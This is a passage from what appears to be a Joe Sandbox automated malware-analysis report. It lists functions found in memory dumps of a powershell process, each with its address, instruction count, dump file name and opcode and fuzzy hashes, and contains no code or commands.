                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 610ba03b1ecd67b5d5be9da07ecbfc49e292ceafb8fb2310ca999e1e44704fd0
                                              • Instruction ID: f724b36bc366ac257321c1e4c2195681fcee13c06d0abfd43901e2a446c3403b
                                              • Opcode Fuzzy Hash: 610ba03b1ecd67b5d5be9da07ecbfc49e292ceafb8fb2310ca999e1e44704fd0
                                              • Instruction Fuzzy Hash: F3519D70A007059FDB25DF68E844B9ABBF2FF88305F10856DE44A9BB91DB31E941CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F2230 Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54f0738a4d15b0ec3a1481436c714a92ad95a15d7f7c7023057eff374c0c3f4a
                                              • Instruction ID: 7bb75707049eb2c1bbcd533e9e4ddb60a32a10a8d6f1e5f9a06d329ac3d373df
                                              • Opcode Fuzzy Hash: 54f0738a4d15b0ec3a1481436c714a92ad95a15d7f7c7023057eff374c0c3f4a
                                              • Instruction Fuzzy Hash: 514106317002508FE708ABB8D894B7F3BD69FCA611F1980B9E505CF3A6DE65DC0287A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0889FD0D Relevance: .1, Instructions: 125COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd31bf00c8c3759988a7508729b4a36138a4a573f237112b2f5f1dccd068e509
                                              • Instruction ID: a250aa6bd0f6f37e62744dbc2011dc79c91a10d4e189a71f737d9bd213fc82a9
                                              • Opcode Fuzzy Hash: fd31bf00c8c3759988a7508729b4a36138a4a573f237112b2f5f1dccd068e509
                                              • Instruction Fuzzy Hash: 59412831B453198FEF2D56B8D81037AB3D59BC1216F28847AC782DF683DE29C842C3A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A22EF Relevance: .1, Instructions: 122COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ea40c0fbb1e740c5c0839ad9a9fc552415aa81df02f43b022f2a1fe8b54df516
                                              • Instruction ID: 752595021829b8de8d3d2dc05e0acaa14779405bda836bf9b175cbeb7f9fe98f
                                              • Opcode Fuzzy Hash: ea40c0fbb1e740c5c0839ad9a9fc552415aa81df02f43b022f2a1fe8b54df516
                                              • Instruction Fuzzy Hash: 6751A774A01209DFDB15CF98D484A9EFBF2FF88214F248559E405AB365C775ED82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EF6B0 Relevance: .1, Instructions: 122COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bdf7ba862c51799e1da21a98c72824e67a96177e2e661b3dde27783f29b846d
                                              • Instruction ID: 41b0f13645e0eeccfe4f8d587762fa035e80339e33f13e6568a938bc71757b37
                                              • Opcode Fuzzy Hash: 2bdf7ba862c51799e1da21a98c72824e67a96177e2e661b3dde27783f29b846d
                                              • Instruction Fuzzy Hash: 25414F71A002048FEB05EFA5D944AEEBFF6FF88315F548069E905B7260DB359D02CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB088 Relevance: .1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 628e0432c1efa44fe4723f5a4fb9dfaafcc94f3aabde96343c80275506fa613d
                                              • Instruction ID: 7e1c2d166b69292f0bb4afa117caf65838a0990b3b926e47e7d1dfade4873cc8
                                              • Opcode Fuzzy Hash: 628e0432c1efa44fe4723f5a4fb9dfaafcc94f3aabde96343c80275506fa613d
                                              • Instruction Fuzzy Hash: 3E317C31B10205CFDB15EF69D484AAEBBE6BF88220F158569E406AB751CA74EC05CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 088941D0 Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 262645013fea0064603778c0fb3bb6c70ecd708b2c9bbfeaa20cb050c665f4bd
                                              • Instruction ID: 7120f3a06ec285986a80ca24983fd8ec8a93387fffd97abd1e0d1195f75060a6
                                              • Opcode Fuzzy Hash: 262645013fea0064603778c0fb3bb6c70ecd708b2c9bbfeaa20cb050c665f4bd
                                              • Instruction Fuzzy Hash: EE319E30B10314AFE714ABA4D854B6E77A6ABC4317F118018E905BF3D5CAB9DC428BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F24C8 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 409ef6927e81b5ebec2915c227e5c55e6c2e5acb74ff9f54157dc744a6214075
                                              • Instruction ID: 8dbbf772494801a0d42e8a8a13d08eb1582370951f935bc678512390622cf90e
                                              • Opcode Fuzzy Hash: 409ef6927e81b5ebec2915c227e5c55e6c2e5acb74ff9f54157dc744a6214075
                                              • Instruction Fuzzy Hash: 7B316075B00109CFDB44DBA8C890AAEBBB6FFC9315F258069D509DB352DA31DD06CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EDB29 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 935d302655e1248d5e77d13493095b975a57aaaae027da4c9e2d553341a9c2c8
                                              • Instruction ID: be71dca10354e68b29b367c0d4455cbdb85b387ad33a0b605f2ac36e79f2ec64
                                              • Opcode Fuzzy Hash: 935d302655e1248d5e77d13493095b975a57aaaae027da4c9e2d553341a9c2c8
                                              • Instruction Fuzzy Hash: EC31B3307002508FD715EB78D808BADBBB1EF89269F19459DE4069B2A1DB349C46CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FD2A0 Relevance: .1, Instructions: 98COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2483bd4d153e256a9eee237161378ef8dc4eb5b8301d0058ea2674ca6fc6a8a
                                              • Instruction ID: 2944be7cb67d6453dec811012a3e34c5fccf4f125364183d13cdd580e920c0ce
                                              • Opcode Fuzzy Hash: d2483bd4d153e256a9eee237161378ef8dc4eb5b8301d0058ea2674ca6fc6a8a
                                              • Instruction Fuzzy Hash: 4E31A070A00219DFDB14DF68D544A9DBBF2FF88305F10826AE901AB391DB71A846CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FD292 Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e58c1ac8c57e7cfa22353c38e53e5bfa624ef212c493d7a327b59630d34f67d2
                                              • Instruction ID: 632a38bbbbde29e61d033cff7dcc784292c577db0ef3c68c0bae80e8b6a23401
                                              • Opcode Fuzzy Hash: e58c1ac8c57e7cfa22353c38e53e5bfa624ef212c493d7a327b59630d34f67d2
                                              • Instruction Fuzzy Hash: 00319170A00215DFEB15DF68C544A9EBBB2FF89304F14866DD901AB392DB71A846CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08891400 Relevance: .1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4bc94bec83d43385848907c3d150f21537b1377d26d9b6633b60ee0ad6076ec2
                                              • Instruction ID: c905918188d25b2384180dc8ae95cce14cefd20c8a8053ed6953b6db09b49365
                                              • Opcode Fuzzy Hash: 4bc94bec83d43385848907c3d150f21537b1377d26d9b6633b60ee0ad6076ec2
                                              • Instruction Fuzzy Hash: 42214939384306D7EF2456AA8844B7AB2D79BC4616F28C53EE585DBAC1CA7DD8418360
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08891530 Relevance: .1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c3c3c4e181bcd496151bf5acac3edae0c461a19a654a6bc85712b2ff930f987
                                              • Instruction ID: b679163da0403b1329673fe3b37f2759e8548092c957b0dbc4e9269b6b943f3c
                                              • Opcode Fuzzy Hash: 0c3c3c4e181bcd496151bf5acac3edae0c461a19a654a6bc85712b2ff930f987
                                              • Instruction Fuzzy Hash: 81216B357083079BEF2456A99844B77B2DA9BC0716F2C843ED58ADBA81DD7DD8428360
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F24D8 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d68055d9e166c8140241d966a73baf1b97c0dc5e7afbe761d642b6f7f4f3d74
                                              • Instruction ID: 0b68e457c4a60227f0a6fea90610544f13e074cb5e679410c545523fcc3fd6a3
                                              • Opcode Fuzzy Hash: 5d68055d9e166c8140241d966a73baf1b97c0dc5e7afbe761d642b6f7f4f3d74
                                              • Instruction Fuzzy Hash: 19314D75B00109CFDB44DBA8C8A0AAFB7B6FFC8315F258029D909DB351DA31ED028B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A1BE0 Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8667686721011c11c33aa02ab56862c6b5f5917363350785543bd920b98dc15a
                                              • Instruction ID: 0e7a2a990d3fb23aea39b17c8f0370ac95739245a25ed6e6525d780f615358bb
                                              • Opcode Fuzzy Hash: 8667686721011c11c33aa02ab56862c6b5f5917363350785543bd920b98dc15a
                                              • Instruction Fuzzy Hash: 8F313A74A04609DFCB10CF58C480AAEFBB1FF89310B258299E41AEB751C735ED81CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F1A17 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee9f96a5ae6ef4f5deac383a875aa07feed62071ab79909cff4b62586e10c1e5
                                              • Instruction ID: 613d79c09b930c648d8b40d045585f15488414f6adcc3d77fb505bc51471cee1
                                              • Opcode Fuzzy Hash: ee9f96a5ae6ef4f5deac383a875aa07feed62071ab79909cff4b62586e10c1e5
                                              • Instruction Fuzzy Hash: A821E63290A3A0CFCB139B74E9181AE3FB4EF81261B0901AFD985DB253D634C945C7D5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FF2F5 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 044db83c76943a4144572f3e579139e042e1f915bfba4a80c679732332ef8136
                                              • Instruction ID: 370ccb62548b444e8c3c9a8302628d5d71ec174346e1e5dc7a35de07e8ebba41
                                              • Opcode Fuzzy Hash: 044db83c76943a4144572f3e579139e042e1f915bfba4a80c679732332ef8136
                                              • Instruction Fuzzy Hash: F531FD35A006049FDB149F78D859BADBBB6EF8C711F148029D516A73A2CF759C42CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A1BD1 Relevance: .1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8642caada9a2e19ac2a005587ca9658931e4ad839041674b871e472f9396bcd
                                              • Instruction ID: d215bc0ba407faabeacc97ec9a50ff65fecf945679137799a652ad547f0ec195
                                              • Opcode Fuzzy Hash: f8642caada9a2e19ac2a005587ca9658931e4ad839041674b871e472f9396bcd
                                              • Instruction Fuzzy Hash: 2331F774A04609DFCB14CF58C5809AEFBB1FF89310B2582A9E516EB751C335EC81CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB078 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aceefe19b37152f6c7b6ea8886a3fa4d9a5238059caac65ce57ffd36a6cdb63b
                                              • Instruction ID: b5f192d56ba7b48856cfc5d610a59e42cec3efbee9fc63db5f5c7357d485bb43
                                              • Opcode Fuzzy Hash: aceefe19b37152f6c7b6ea8886a3fa4d9a5238059caac65ce57ffd36a6cdb63b
                                              • Instruction Fuzzy Hash: 70316F30B102559FDB15EF69D894AAEBFF6BF88210F148569E402AB351CBB4DC05CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A9D58 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d540cfa2be543ccf6808862210d8cfb8bfecf5217bb8df8ac0185a1a1aee639
                                              • Instruction ID: 806bc09bb890b79355f2bd32e86cbfa7df88c57c9c4c85734993d1cedb76d5a9
                                              • Opcode Fuzzy Hash: 6d540cfa2be543ccf6808862210d8cfb8bfecf5217bb8df8ac0185a1a1aee639
                                              • Instruction Fuzzy Hash: E731BD31B00225CFCB25DB68D884ABEBBE6EFC8611B144669DC15AB351DB70EC52CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F9280 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 284d7584f497bc6de01f97ec5400549886cccd47fa7b4921e8a9c119646db1b9
                                              • Instruction ID: b0fbecab951db92679eafd213d6a681e8610f57c4892812237a4382f43f3139a
                                              • Opcode Fuzzy Hash: 284d7584f497bc6de01f97ec5400549886cccd47fa7b4921e8a9c119646db1b9
                                              • Instruction Fuzzy Hash: 9D21BF35A001188FDF58EBA4D4547AE7BF6AFC8742F254469D906E7380CF3A9D02CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FE32A Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: afb1ea28a6b611702042b6126fcc73b43e16d4d334cf4f05a10f9282434f3e1f
                                              • Instruction ID: 214e3b3e22295e6184c32e196b16f64c7bb20515e2d8e563d4164f8228ba82e4
                                              • Opcode Fuzzy Hash: afb1ea28a6b611702042b6126fcc73b43e16d4d334cf4f05a10f9282434f3e1f
                                              • Instruction Fuzzy Hash: 83317F30A002059FDB149B78D4587AEBBF6EF89311F14447DE505AB3A2DF39AC45CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 088913E6 Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f54bbb063e740843088d6342e12410e1a13ca2eb54fe67bde11b12c5d9cde45
                                              • Instruction ID: 9e0025dbfaa6f84b33846308234d3469e29aa27f178b2dcccce5450ec953c8cd
                                              • Opcode Fuzzy Hash: 2f54bbb063e740843088d6342e12410e1a13ca2eb54fe67bde11b12c5d9cde45
                                              • Instruction Fuzzy Hash: 35214935748386ABEF2416B64815BB57B929FC5612F18846AE984DF6C3C67D9841C330
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FE338 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1ac82d76a18c907feb635dc9e6ce7e0968995f1954e44d74688bb2b020d9576
                                              • Instruction ID: f8b83bc1f37b110a7487d54f8519259d358eb531646d999ec17686596bbee40b
                                              • Opcode Fuzzy Hash: e1ac82d76a18c907feb635dc9e6ce7e0968995f1954e44d74688bb2b020d9576
                                              • Instruction Fuzzy Hash: D5316D30B002099FEB149B68D458BAEBBF6EB88311F14447DE505AB3A2DF75AC45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08891512 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a942c84e7b9054a5a93f16b4743c74e3ffe674f7c565a81fd8d696577bf7905
                                              • Instruction ID: 45542c771ce6d334bb612c94d1a12318ddf363d6f3e60a54b6b18ecfd1ac4ae4
                                              • Opcode Fuzzy Hash: 0a942c84e7b9054a5a93f16b4743c74e3ffe674f7c565a81fd8d696577bf7905
                                              • Instruction Fuzzy Hash: 6221873570C3865FEF32466549047B23BA59FC2352F1E806AE9C5DBAC3CA6D9801C331
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EDA90 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8811d4469d3c62e65f7453ca7ef58236e0315e88cc265ea96a20b01a03374815
                                              • Instruction ID: 897e07221db05f85d065135ea9af3d6b6b7469f74cd4944e02178630192535ea
                                              • Opcode Fuzzy Hash: 8811d4469d3c62e65f7453ca7ef58236e0315e88cc265ea96a20b01a03374815
                                              • Instruction Fuzzy Hash: 3921AD71E042599FDB15DFA9C804AEEBFF6AF89300F14846AE401F7261DB749A40CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A9D48 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c351b383eaa05e1d60b1b7f6a3a77d03a12a2227f6a78f2cde6b6c07bfe08231
                                              • Instruction ID: 5fb67b96bd95f02758f2aad99e57179c6b7b94bba3806d521ac73117d494f7ef
                                              • Opcode Fuzzy Hash: c351b383eaa05e1d60b1b7f6a3a77d03a12a2227f6a78f2cde6b6c07bfe08231
                                              • Instruction Fuzzy Hash: B121C272A00256CFCB15CBA4D840AAEBBB5EFC5652B0005AAD814EF212D771D845C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F1CD0 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 600792d042305b19ee52061d5b096a6db83ce3fbbe50a1b32081bfa9fd61525a
                                              • Instruction ID: 1c23ab7fdabca70dab00d9fa3edef77401917ee5ad01b84307d19c049ba25df6
                                              • Opcode Fuzzy Hash: 600792d042305b19ee52061d5b096a6db83ce3fbbe50a1b32081bfa9fd61525a
                                              • Instruction Fuzzy Hash: 1121F03A305351DBCB268635A02477E36B65FC0697F09413EE906C7283DB69C885D3D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A5440 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe70f824c3eabb2d4f298df5e3bc0ef19fca54d1b252ef0151d3dbe7ee29e9af
                                              • Instruction ID: c377b2f1ca39dc77e08e4e817649dfbf15a1ea947d521b12d348fc2e5844c2c0
                                              • Opcode Fuzzy Hash: fe70f824c3eabb2d4f298df5e3bc0ef19fca54d1b252ef0151d3dbe7ee29e9af
                                              • Instruction Fuzzy Hash: 39216D71A006089BEB14DFA9D894BEEBFF6EF88711F148029D906BB380DB755945CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F1CE0 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5ff004de3d9e3469ddb5bcd8be076da8593a587c2d642acb79f01422376b7d34
                                              • Instruction ID: efa0334f00cbf9ef8d67caf0f3f6e60f36f4691e26b51d27f9fa0aab6dc8d6f7
                                              • Opcode Fuzzy Hash: 5ff004de3d9e3469ddb5bcd8be076da8593a587c2d642acb79f01422376b7d34
                                              • Instruction Fuzzy Hash: 2F11A23A315610DBDB26862AA02477E75BA9BC0797F14813DE906877C2DBA9C881D3D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E9670 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42874338c1cf2baa6d41ecd20faf6c809c809cd7563d8e0e052a1f8200c9025c
                                              • Instruction ID: d8dcb25bcc36c80212c2a13a3a7ef4c7d729da1542d5a4d9748859e3afb25141
                                              • Opcode Fuzzy Hash: 42874338c1cf2baa6d41ecd20faf6c809c809cd7563d8e0e052a1f8200c9025c
                                              • Instruction Fuzzy Hash: F021F635701244AFDB16AF64D854BAE7FB2ABC8710F10406DF504AB3A1CA764C06C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08890AF4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
